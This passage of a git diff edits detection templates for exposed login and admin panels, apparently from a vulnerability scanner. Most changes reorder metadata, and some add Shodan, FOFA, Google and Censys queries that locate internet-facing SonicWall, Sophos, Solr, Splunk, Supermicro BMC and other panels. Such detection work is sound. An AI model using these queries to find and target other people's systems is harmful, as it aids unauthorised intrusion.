a/http/exposed-panels/signet-explorer-dashboard.yaml +++ b/http/exposed-panels/signet-explorer-dashboard.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: html:"mempool-space" || title:"Signet Explorer" - verified: true tags: panel,signet,bitcoin,dashboard http: diff --git a/http/exposed-panels/sitefinity-login.yaml b/http/exposed-panels/sitefinity-login.yaml index 524d45556c..f09fa6fbf7 100644 --- a/http/exposed-panels/sitefinity-login.yaml +++ b/http/exposed-panels/sitefinity-login.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:progress:sitefinity_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: sitefinity_cms vendor: progress + product: sitefinity_cms tags: sitefinity,edb,panel,progress http: diff --git a/http/exposed-panels/siteomat-login.yaml b/http/exposed-panels/siteomat-login.yaml index 956438c33a..5cf5f92aed 100644 --- a/http/exposed-panels/siteomat-login.yaml +++ b/http/exposed-panels/siteomat-login.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:orpak:siteomat:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: siteomat vendor: orpak + product: siteomat tags: siteomat,login,edb,panel,orpak http: diff --git a/http/exposed-panels/skeepers-panel.yaml b/http/exposed-panels/skeepers-panel.yaml index 4a162a2d4e..dd9524e70c 100644 --- a/http/exposed-panels/skeepers-panel.yaml +++ b/http/exposed-panels/skeepers-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://skeepers.io metadata: + verified: true max-request: 2 shodan-query: http.title:"Skeepers" - verified: true tags: panel,skeepers,login,detect http: diff --git a/http/exposed-panels/skycaiji-admin-panel.yaml b/http/exposed-panels/skycaiji-admin-panel.yaml index 7f14f6e474..a961dd6520 100644 --- a/http/exposed-panels/skycaiji-admin-panel.yaml +++ b/http/exposed-panels/skycaiji-admin-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:skycaiji:skycaiji:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: skycaiji vendor: skycaiji + product: skycaiji tags: panel,tech,skycaiji http: diff --git a/http/exposed-panels/smartping-dashboard.yaml b/http/exposed-panels/smartping-dashboard.yaml index a92522e173..e9c8ade363 100644 --- a/http/exposed-panels/smartping-dashboard.yaml +++ b/http/exposed-panels/smartping-dashboard.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"SmartPing Dashboard" - verified: true tags: panel,misconfig,unauth,smartping http: diff --git a/http/exposed-panels/snapcomms-panel.yaml b/http/exposed-panels/snapcomms-panel.yaml index 0ddab742e0..a782ad2091 100644 --- a/http/exposed-panels/snapcomms-panel.yaml +++ b/http/exposed-panels/snapcomms-panel.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.snapcomms.com/ metadata: - max-request: 1 verified: true + max-request: 1 tags: panel,snapcomms,login,detect http: diff --git a/http/exposed-panels/softether-vpn-panel.yaml b/http/exposed-panels/softether-vpn-panel.yaml index 3581b61723..5df5fdf7d4 100644 --- a/http/exposed-panels/softether-vpn-panel.yaml +++ b/http/exposed-panels/softether-vpn-panel.yaml @@ -7,9 +7,9 @@ info: description: | SoftEther VPN panel was detected. metadata: + verified: true max-request: 1 shodan-query: http.title:"SoftEther VPN Server" - verified: true tags: panel,vpn,softether http: diff --git a/http/exposed-panels/solarview-compact-panel.yaml b/http/exposed-panels/solarview-compact-panel.yaml index 324622097d..fa7425662d 100644 --- a/http/exposed-panels/solarview-compact-panel.yaml +++ b/http/exposed-panels/solarview-compact-panel.yaml @@ -10,11 +10,19 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: solarview_compact_firmware - shodan-query: http.html:"SolarView Compact" - vendor: contec verified: true + max-request: 1 + vendor: contec + product: solarview_compact_firmware + shodan-query: + - http.html:"SolarView Compact" + - http.favicon.hash:"-244067125" + - http.html:"solarview compact" + - cpe:"cpe:2.3:o:contec:solarview_compact_firmware" + fofa-query: + - body="solarview compact" && title="top" + - icon_hash="-244067125" + - body="solarview compact" tags: panel,solarview,iot,contec http: diff --git a/http/exposed-panels/solarwinds-arm-panel.yaml b/http/exposed-panels/solarwinds-arm-panel.yaml index d93c0d7d4c..7a9df70de9 100644 --- a/http/exposed-panels/solarwinds-arm-panel.yaml +++ b/http/exposed-panels/solarwinds-arm-panel.yaml @@ -13,12 +13,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:solarwinds:access_rights_manager:*:*:*:*:*:*:*:* metadata: - censys-query: services.http.response.html_title="Solarwinds Access Rights Manager" + verified: true max-request: 1 + vendor: solarwinds product: access_rights_manager shodan-query: http.favicon.hash:-1416464161 - vendor: solarwinds - verified: true + censys-query: + - services.http.response.html_title="Solarwinds Access Rights Manager" + - services.http.response.html_title="solarwinds access rights manager" + fofa-query: icon_hash=-1416464161 tags: panel,solarwinds http: diff --git a/http/exposed-panels/solarwinds-orion.yaml b/http/exposed-panels/solarwinds-orion.yaml index ec03dd23eb..5a64bded24 100644 --- a/http/exposed-panels/solarwinds-orion.yaml +++ b/http/exposed-panels/solarwinds-orion.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:solarwinds:orion_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: orion_platform vendor: solarwinds + product: orion_platform tags: panel,solarwinds http: diff --git a/http/exposed-panels/solarwinds-servuftp-detect.yaml b/http/exposed-panels/solarwinds-servuftp-detect.yaml index 683c2f1593..e7e1592d69 100644 --- a/http/exposed-panels/solarwinds-servuftp-detect.yaml +++ b/http/exposed-panels/solarwinds-servuftp-detect.yaml @@ -11,8 +11,9 @@ info: cpe: cpe:2.3:a:solarwinds:serv-u:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: serv-u vendor: solarwinds + product: serv-u + shodan-query: product:"rhinosoft serv-u httpd" tags: solarwinds,panel http: diff --git a/http/exposed-panels/solr-panel-exposure.yaml b/http/exposed-panels/solr-panel-exposure.yaml index c060702704..98e9728983 100644 --- a/http/exposed-panels/solr-panel-exposure.yaml +++ b/http/exposed-panels/solr-panel-exposure.yaml @@ -10,11 +10,21 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: solr - shodan-query: http.title:"Solr Admin" - vendor: apache verified: true + max-request: 2 + vendor: apache + product: solr + shodan-query: + - http.title:"Solr Admin" + - http.title:"apache solr" + - cpe:"cpe:2.3:a:apache:solr" + - http.title:"solr admin" + fofa-query: + - title="solr admin" + - title="apache solr" + google-query: + - intitle:"apache solr" + - intitle:"solr admin" tags: panel,solr,apache,admin http: diff --git a/http/exposed-panels/somansa-dlp-detect.yaml b/http/exposed-panels/somansa-dlp-detect.yaml index 21a32ddeec..f5a04e3233 100644 --- a/http/exposed-panels/somansa-dlp-detect.yaml +++ b/http/exposed-panels/somansa-dlp-detect.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.html:"DLP system" - verified: true tags: panel,somansa,dlp http: diff --git a/http/exposed-panels/sonarqube-login.yaml b/http/exposed-panels/sonarqube-login.yaml index c337aada02..6d53c49294 100644 --- a/http/exposed-panels/sonarqube-login.yaml +++ b/http/exposed-panels/sonarqube-login.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:sonarsource:sonarqube:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: sonarqube vendor: sonarsource + product: sonarqube tags: panel,sonarqube,sonarsource http: diff --git a/http/exposed-panels/sonic-wall-application.yaml b/http/exposed-panels/sonic-wall-application.yaml index 02f6633269..5c94261047 100644 --- a/http/exposed-panels/sonic-wall-application.yaml +++ b/http/exposed-panels/sonic-wall-application.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:o:sonicwall:sma1000_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: sma1000_firmware - shodan-query: title:"Appliance Management Console Login" - vendor: sonicwall verified: true + max-request: 1 + vendor: sonicwall + product: sma1000_firmware + shodan-query: + - title:"Appliance Management Console Login" + - http.title:"appliance management console login" + fofa-query: title="appliance management console login" + google-query: intitle:"appliance management console login" tags: panel,sonicwall,login http: diff --git a/http/exposed-panels/sonic-wall-login.yaml b/http/exposed-panels/sonic-wall-login.yaml index 861eaba5b2..c85ce07efe 100644 --- a/http/exposed-panels/sonic-wall-login.yaml +++ b/http/exposed-panels/sonic-wall-login.yaml @@ -8,11 +8,15 @@ info: classification: cpe: cpe:2.3:h:sonicwall:tz_350:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: tz_350 - shodan-query: title:"SonicWall Network Security Login" - vendor: sonicwall verified: true + max-request: 2 + vendor: sonicwall + product: tz_350 + shodan-query: + - title:"SonicWall Network Security Login" + - http.title:"sonicwall network security login" + fofa-query: title="sonicwall network security login" + google-query: intitle:"sonicwall network security login" tags: panel,sonicwall,login http: diff --git a/http/exposed-panels/sonicwall-analyzer-login.yaml b/http/exposed-panels/sonicwall-analyzer-login.yaml index d01072ea61..aac436660b 100644 --- a/http/exposed-panels/sonicwall-analyzer-login.yaml +++ b/http/exposed-panels/sonicwall-analyzer-login.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:sonicwall:analyzer:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: analyzer - shodan-query: title:"SonicWall Analyzer Login" - vendor: sonicwall verified: true + max-request: 1 + vendor: sonicwall + product: analyzer + shodan-query: + - title:"SonicWall Analyzer Login" + - http.title:"sonicwall analyzer login" + fofa-query: title="sonicwall analyzer login" + google-query: intitle:"sonicwall analyzer login" tags: panel,sonicwall http: diff --git a/http/exposed-panels/sonicwall-management-panel.yaml b/http/exposed-panels/sonicwall-management-panel.yaml index 8ba44b9b16..51eceb106c 100644 --- a/http/exposed-panels/sonicwall-management-panel.yaml +++ b/http/exposed-panels/sonicwall-management-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:sonicwall:global_management_system:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: global_management_system vendor: sonicwall + product: global_management_system tags: panel,sonicwall http: diff --git a/http/exposed-panels/sonicwall-sslvpn-panel.yaml b/http/exposed-panels/sonicwall-sslvpn-panel.yaml index 7ed9675df7..ebfd8f66c0 100644 --- a/http/exposed-panels/sonicwall-sslvpn-panel.yaml +++ b/http/exposed-panels/sonicwall-sslvpn-panel.yaml @@ -11,8 +11,9 @@ info: cpe: cpe:2.3:o:sonicwall:sonicos:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: sonicos vendor: sonicwall + product: sonicos + google-query: inurl:"auth.html" intitle:"sonicwall" tags: panel,sonicwall http: diff --git a/http/exposed-panels/sophos-fw-version-detect.yaml b/http/exposed-panels/sophos-fw-version-detect.yaml index 387fcaa646..fb22704c37 100644 --- a/http/exposed-panels/sophos-fw-version-detect.yaml +++ b/http/exposed-panels/sophos-fw-version-detect.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:o:sophos:sfos:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: sfos - shodan-query: title:"Sophos" - vendor: sophos verified: true + max-request: 2 + vendor: sophos + product: sfos + shodan-query: + - title:"Sophos" + - http.title:"sophos" + fofa-query: title="sophos" + google-query: intitle:"sophos" tags: panel,sophos http: diff --git a/http/exposed-panels/sophos-mobile-panel.yaml b/http/exposed-panels/sophos-mobile-panel.yaml index e791de2d9b..2ecc48e0c6 100644 --- a/http/exposed-panels/sophos-mobile-panel.yaml +++ b/http/exposed-panels/sophos-mobile-panel.yaml @@ -14,9 +14,16 @@ info: cpe: cpe:2.3:a:sophos:mobile:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: mobile - shodan-query: http.title:"Sophos Mobile" vendor: sophos + product: mobile + shodan-query: + - http.title:"Sophos Mobile" + - http.title:"sophos mobile" + - http.favicon.hash:-1274798165 + fofa-query: + - icon_hash=-1274798165 + - title="sophos mobile" + google-query: intitle:"sophos mobile" tags: panel,sophos http: diff --git a/http/exposed-panels/sophos-web-appliance.yaml b/http/exposed-panels/sophos-web-appliance.yaml index 30b0317fa4..e791ba2e69 100644 --- a/http/exposed-panels/sophos-web-appliance.yaml +++ b/http/exposed-panels/sophos-web-appliance.yaml @@ -9,11 +9,17 @@ info: classification: cpe: cpe:2.3:a:sophos:web_appliance:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: web_appliance - shodan-query: http.favicon.hash:-893681401 - vendor: sophos verified: true + max-request: 1 + vendor: sophos + product: web_appliance + shodan-query: + - http.favicon.hash:-893681401 + - http.title:"sophos web appliance" + fofa-query: + - title="sophos web appliance" + - icon_hash=-893681401 + google-query: intitle:"sophos web appliance" tags: panel,login,sophos http: diff --git a/http/exposed-panels/spacelogic-cbus-panel.yaml b/http/exposed-panels/spacelogic-cbus-panel.yaml index 722c0231f9..9b9bd4c8ed 100644 --- a/http/exposed-panels/spacelogic-cbus-panel.yaml +++ b/http/exposed-panels/spacelogic-cbus-panel.yaml @@ -5,11 +5,14 @@ info: author: ritikchaddha severity: info metadata: - max-request: 1 - product: spacelogic_c-bus_home_controller_firmware - shodan-query: html:"SpaceLogic C-Bus" - vendor: schneider-electric verified: true + max-request: 1 + vendor: schneider-electric + product: spacelogic_c-bus_home_controller_firmware + shodan-query: + - html:"SpaceLogic C-Bus" + - http.html:"spacelogic c-bus" + fofa-query: body="spacelogic c-bus" tags: panel,spacelogic,login,schneider-electric http: diff --git a/http/exposed-panels/spark-panel.yaml b/http/exposed-panels/spark-panel.yaml index 2339b87459..5669c53cac 100644 --- a/http/exposed-panels/spark-panel.yaml +++ b/http/exposed-panels/spark-panel.yaml @@ -12,11 +12,18 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:apache:spark:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: spark - shodan-query: html:"/apps/IMT/Html/" - vendor: apache verified: true + max-request: 1 + vendor: apache + product: spark + shodan-query: + - html:"/apps/IMT/Html/" + - http.html:"/apps/imt/html/" + - http.title:"spark master at" + fofa-query: + - title="spark master at" + - body="/apps/imt/html/" + google-query: intitle:"spark master at" tags: panel,spark,apache http: diff --git a/http/exposed-panels/speedtest-panel.yaml b/http/exposed-panels/speedtest-panel.yaml index 15fe5b0c12..0cfcd76e16 100644 --- a/http/exposed-panels/speedtest-panel.yaml +++ b/http/exposed-panels/speedtest-panel.yaml @@ -10,9 +10,9 @@ info: - https://github.com/alexjustesen/speedtest-tracker - https://docs.speedtest-tracker.dev/ metadata: + verified: true max-request: 1 shodan-query: title:"Speedtest Tracker" - verified: true tags: speedtest,tracker,panel,login http: diff --git a/http/exposed-panels/sphider-login.yaml b/http/exposed-panels/sphider-login.yaml index b12e3e5db9..c4c3714f5e 100644 --- a/http/exposed-panels/sphider-login.yaml +++ b/http/exposed-panels/sphider-login.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:sphider:sphider:*:*:*:*:*:*:*:* metadata: max-request: 3 - product: sphider vendor: sphider + product: sphider tags: edb,panel,sphider http: diff --git a/http/exposed-panels/sphinxonline-panel.yaml b/http/exposed-panels/sphinxonline-panel.yaml index 9bfe55ec32..8120fec5cb 100644 --- a/http/exposed-panels/sphinxonline-panel.yaml +++ b/http/exposed-panels/sphinxonline-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.lesphinx-developpement.fr/ metadata: + verified: true max-request: 1 shodan-query: http.title:"Connection - SphinxOnline" - verified: true tags: panel,sphinxonline,login,detect http: diff --git a/http/exposed-panels/splunk-enterprise-panel.yaml b/http/exposed-panels/splunk-enterprise-panel.yaml index 1f07ac2f36..cfaf68a8a5 100644 --- a/http/exposed-panels/splunk-enterprise-panel.yaml +++ b/http/exposed-panels/splunk-enterprise-panel.yaml @@ -13,9 +13,13 @@ info: cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: splunk - shodan-query: http.title:"Login - Splunk" vendor: splunk + product: splunk + shodan-query: + - http.title:"Login - Splunk" + - http.title:"login - splunk" + fofa-query: title="login - splunk" + google-query: intitle:"login - splunk" tags: panel,splunk http: diff --git a/http/exposed-panels/spotweb-login-panel.yaml b/http/exposed-panels/spotweb-login-panel.yaml index 630dbbd99a..946408cee0 100644 --- a/http/exposed-panels/spotweb-login-panel.yaml +++ b/http/exposed-panels/spotweb-login-panel.yaml @@ -7,11 +7,15 @@ info: classification: cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: spotweb - shodan-query: title:"SpotWeb - overview" - vendor: spotweb_project verified: true + max-request: 1 + vendor: spotweb_project + product: spotweb + shodan-query: + - title:"SpotWeb - overview" + - http.title:"spotweb - overview" + fofa-query: title="spotweb - overview" + google-query: intitle:"spotweb - overview" tags: panel,spotweb,detect,spotweb_project http: diff --git a/http/exposed-panels/sql-monitor.yaml b/http/exposed-panels/sql-monitor.yaml index 17c58d8f2f..f2592edf8f 100644 --- a/http/exposed-panels/sql-monitor.yaml +++ b/http/exposed-panels/sql-monitor.yaml @@ -11,9 +11,12 @@ info: cpe: cpe:2.3:a:red-gate:sql_monitor:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: sql_monitor - shodan-query: html:"SQL Monitor" vendor: red-gate + product: sql_monitor + shodan-query: + - html:"SQL Monitor" + - http.html:"sql monitor" + fofa-query: body="sql monitor" tags: panel,red-gate http: diff --git a/http/exposed-panels/sqlbuddy-panel.yaml b/http/exposed-panels/sqlbuddy-panel.yaml index cf88d39dc1..30fef03917 100644 --- a/http/exposed-panels/sqlbuddy-panel.yaml +++ b/http/exposed-panels/sqlbuddy-panel.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.title:"SQL Buddy" - verified: true tags: panel,sqlbuddy http: diff --git a/http/exposed-panels/squirrelmail-login.yaml b/http/exposed-panels/squirrelmail-login.yaml index c5a9fe4846..957ad9fc75 100644 --- a/http/exposed-panels/squirrelmail-login.yaml +++ b/http/exposed-panels/squirrelmail-login.yaml @@ -13,9 +13,14 @@ info: cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* metadata: max-request: 4 - product: squirrelmail - shodan-query: title:"SquirrelMail" vendor: squirrelmail + product: squirrelmail + shodan-query: + - title:"SquirrelMail" + - http.title:"squirrelmail" + - cpe:"cpe:2.3:a:squirrelmail:squirrelmail" + fofa-query: title="squirrelmail" + google-query: intitle:"squirrelmail" tags: squirrelmail,edb,panel http: diff --git a/http/exposed-panels/sqwebmail-login-panel.yaml b/http/exposed-panels/sqwebmail-login-panel.yaml index fbe48f7624..77351e4588 100644 --- a/http/exposed-panels/sqwebmail-login-panel.yaml +++ b/http/exposed-panels/sqwebmail-login-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: title:"SqWebMail" - verified: true tags: webmail,sqwebmail,panel http: diff --git a/http/exposed-panels/star-network-utility.yaml b/http/exposed-panels/star-network-utility.yaml index b43d275925..735c7481df 100644 --- a/http/exposed-panels/star-network-utility.yaml +++ b/http/exposed-panels/star-network-utility.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"Network Utility" - verified: true tags: panel,utility http: diff --git a/http/exposed-panels/steve-login-panel.yaml b/http/exposed-panels/steve-login-panel.yaml index f2f1ddaf4e..6e289da95c 100644 --- a/http/exposed-panels/steve-login-panel.yaml +++ b/http/exposed-panels/steve-login-panel.yaml @@ -12,10 +12,10 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"SteVe - Steckdosenverwaltung" + verified: true max-request: 2 shodan-query: http.title:"SteVe - Steckdosenverwaltung" - verified: true + google-query: intitle:"SteVe - Steckdosenverwaltung" tags: panel,steve http: diff --git a/http/exposed-panels/storybook-panel.yaml b/http/exposed-panels/storybook-panel.yaml index 384ae280c0..b0ec104a9b 100644 --- a/http/exposed-panels/storybook-panel.yaml +++ b/http/exposed-panels/storybook-panel.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.title:"storybook" - verified: true tags: panel,storybook,workshop http: diff --git a/http/exposed-panels/strapi-documentation.yaml b/http/exposed-panels/strapi-documentation.yaml index 16974f8318..4a301b23d5 100644 --- a/http/exposed-panels/strapi-documentation.yaml +++ b/http/exposed-panels/strapi-documentation.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:strapi:strapi:*:*:*:*:node.js:*:*:* metadata: max-request: 2 - product: strapi vendor: strapi + product: strapi tags: strapi,panel http: diff --git a/http/exposed-panels/strapi-panel.yaml b/http/exposed-panels/strapi-panel.yaml index 7cba97e754..4f2de2c47b 100644 --- a/http/exposed-panels/strapi-panel.yaml +++ b/http/exposed-panels/strapi-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:strapi:strapi:*:*:*:*:node.js:*:*:* metadata: max-request: 1 - product: strapi vendor: strapi + product: strapi tags: panel,strapi,login http: diff --git a/http/exposed-panels/structurizr-panel.yaml b/http/exposed-panels/structurizr-panel.yaml index 0d44a0daef..fd6bd0131a 100644 --- a/http/exposed-panels/structurizr-panel.yaml +++ b/http/exposed-panels/structurizr-panel.yaml @@ -10,11 +10,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:structurizr:on-premises_installation:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 2 + vendor: structurizr product: on-premises_installation shodan-query: http.favicon.hash:1199592666 - vendor: structurizr - verified: true + fofa-query: icon_hash=1199592666 tags: panel,structurizr,detect http: diff --git a/http/exposed-panels/subrion-login.yaml b/http/exposed-panels/subrion-login.yaml index cbc5166ec1..130d7c4c22 100644 --- a/http/exposed-panels/subrion-login.yaml +++ b/http/exposed-panels/subrion-login.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:intelliants:subrion:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: subrion vendor: intelliants + product: subrion tags: panel,subrion,intelliants http: diff --git a/http/exposed-panels/sugarcrm-panel.yaml b/http/exposed-panels/sugarcrm-panel.yaml index e8919880e9..a84d0307e6 100644 --- a/http/exposed-panels/sugarcrm-panel.yaml +++ b/http/exposed-panels/sugarcrm-panel.yaml @@ -11,9 +11,17 @@ info: cpe: cpe:2.3:a:sugarcrm:sugarcrm:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: sugarcrm - shodan-query: http.title:sugarcrm vendor: sugarcrm + product: sugarcrm + shodan-query: + - http.title:sugarcrm + - http.html:"sugarcrm inc. all rights reserved" + google-query: + - intitle:sugarcrm + - intext:"sugarcrm inc. all rights reserved" + fofa-query: + - title=sugarcrm + - body="sugarcrm inc. all rights reserved" tags: sugarcrm,panel http: diff --git a/http/exposed-panels/sunbird-dcim-panel.yaml b/http/exposed-panels/sunbird-dcim-panel.yaml index d6fd78b532..730a986c66 100644 --- a/http/exposed-panels/sunbird-dcim-panel.yaml +++ b/http/exposed-panels/sunbird-dcim-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.favicon.hash:781922099 - verified: true tags: sunbird,panel,login http: diff --git a/http/exposed-panels/sungrow-logger1000-detect.yaml b/http/exposed-panels/sungrow-logger1000-detect.yaml index 016b7bf0ae..0bb9f309d9 100644 --- a/http/exposed-panels/sungrow-logger1000-detect.yaml +++ b/http/exposed-panels/sungrow-logger1000-detect.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:logger html:"htmlWebpackPlugin.options.title" - verified: true tags: panel,logger1000,sungrow http: diff --git a/http/exposed-panels/superadmin-ui-panel.yaml b/http/exposed-panels/superadmin-ui-panel.yaml index c272a394dc..56481722ac 100644 --- a/http/exposed-panels/superadmin-ui-panel.yaml +++ b/http/exposed-panels/superadmin-ui-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Superadmin UI - 4myhealth" - verified: true tags: panel,superadmin http: diff --git a/http/exposed-panels/supermicro-bmc-panel.yaml b/http/exposed-panels/supermicro-bmc-panel.yaml index d0a29f610c..9acc6912ca 100644 --- a/http/exposed-panels/supermicro-bmc-panel.yaml +++ b/http/exposed-panels/supermicro-bmc-panel.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"Supermicro BMC Login" max-request: 1 shodan-query: http.title:"Supermicro BMC Login" + google-query: intitle:"Supermicro BMC Login" tags: panel,supermicro,bmc http: diff --git a/http/exposed-panels/superset-login.yaml b/http/exposed-panels/superset-login.yaml index e7f9d0dcd6..288214e66b 100644 --- a/http/exposed-panels/superset-login.yaml +++ b/http/exposed-panels/superset-login.yaml @@ -10,11 +10,16 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:apache:superset:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: superset - shodan-query: http.favicon.hash:1582430156 - vendor: apache verified: true + max-request: 2 + vendor: apache + product: superset + shodan-query: + - http.favicon.hash:1582430156 + - http.html:"apache superset" + fofa-query: + - body="apache superset" + - icon_hash=1582430156 tags: panel,superset,apache http: diff --git a/http/exposed-panels/syfadis-xperience-panel.yaml b/http/exposed-panels/syfadis-xperience-panel.yaml index 73548e6a05..e27135cd65 100644 --- a/http/exposed-panels/syfadis-xperience-panel.yaml +++ b/http/exposed-panels/syfadis-xperience-panel.yaml @@ -9,8 +9,8 @@ info: reference: - https://syfadis.fr/xperience metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: title="Syfadis Xperience" tags: panel,syfadis,login,detect diff --git a/http/exposed-panels/symantec/symantec-dlp-login.yaml b/http/exposed-panels/symantec/symantec-dlp-login.yaml index 5e776a1ed4..80a6a7ad4f 100644 --- a/http/exposed-panels/symantec/symantec-dlp-login.yaml +++ b/http/exposed-panels/symantec/symantec-dlp-login.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:symantec:data_loss_prevention:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: data_loss_prevention - shodan-query: http.title:"Symantec Data Loss Prevention" vendor: symantec + product: data_loss_prevention + shodan-query: + - http.title:"Symantec Data Loss Prevention" + - http.title:"symantec data loss prevention" + fofa-query: title="symantec data loss prevention" + google-query: intitle:"symantec data loss prevention" tags: symantec,panel,login http: diff --git a/http/exposed-panels/symantec/symantec-epm-login.yaml b/http/exposed-panels/symantec/symantec-epm-login.yaml index 2ed08495fb..c79bc41997 100644 --- a/http/exposed-panels/symantec/symantec-epm-login.yaml +++ b/http/exposed-panels/symantec/symantec-epm-login.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:symantec:endpoint_protection_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: endpoint_protection_manager - shodan-query: http.title:"Symantec Endpoint Protection Manager" vendor: symantec + product: endpoint_protection_manager + shodan-query: + - http.title:"Symantec Endpoint Protection Manager" + - http.title:"symantec endpoint protection manager" + fofa-query: title="symantec endpoint protection manager" + google-query: intitle:"symantec endpoint protection manager" tags: symantec,panel,login http: diff --git a/http/exposed-panels/symantec/symantec-iam-console.yaml b/http/exposed-panels/symantec/symantec-iam-console.yaml index 7822e0add0..d0cb476885 100644 --- a/http/exposed-panels/symantec/symantec-iam-console.yaml +++ b/http/exposed-panels/symantec/symantec-iam-console.yaml @@ -12,8 +12,8 @@ info: cpe: cpe:2.3:a:broadcom:symantec_identity_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: symantec_identity_manager vendor: broadcom + product: symantec_identity_manager tags: symantec,panel,login,broadcom http: diff --git a/http/exposed-panels/symantec/symantec-phishing-panel.yaml b/http/exposed-panels/symantec/symantec-phishing-panel.yaml index e44ddbe9e8..bffeceec99 100644 --- a/http/exposed-panels/symantec/symantec-phishing-panel.yaml +++ b/http/exposed-panels/symantec/symantec-phishing-panel.yaml @@ -8,8 +8,8 @@ info: reference: - https://www.broadcom.com/products/cybersecurity/email/phishing-readiness metadata: - max-request: 1 verified: true + max-request: 1 tags: symantec,panel,login self-contained: true diff --git a/http/exposed-panels/synapse-mobility-panel.yaml b/http/exposed-panels/synapse-mobility-panel.yaml index 7ce79d6d9c..384c0716d7 